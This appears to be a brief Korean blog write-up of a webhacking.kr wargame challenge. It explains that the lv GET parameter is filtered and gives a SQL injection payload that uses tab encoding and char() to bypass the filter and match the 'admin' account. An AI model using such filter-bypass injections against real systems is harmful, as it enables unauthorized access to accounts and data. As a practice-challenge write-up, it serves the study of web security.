lv을 Get으로 받고 필터링한다. (공백 limit등등...)
그에 맞춰서 구문을 짜주면
?lv=99%09or%09id=char(97,100,109,105,110)
char로 변환되어 admin이 된다.
클
'Challenge > webhacking.kr' 카테고리의 다른 글
| Webhacking 48번 문제 풀이 (0) | 2020.02.18 |
|---|---|
| Webhacking 47번 문제 풀이 (0) | 2020.02.17 |
| Webhacking 45번 문제 풀이 (0) | 2020.02.17 |
| Webhacking 44번 문제 풀이 (0) | 2020.02.14 |
| Webhacking 43번 문제 풀이 (0) | 2020.02.13 |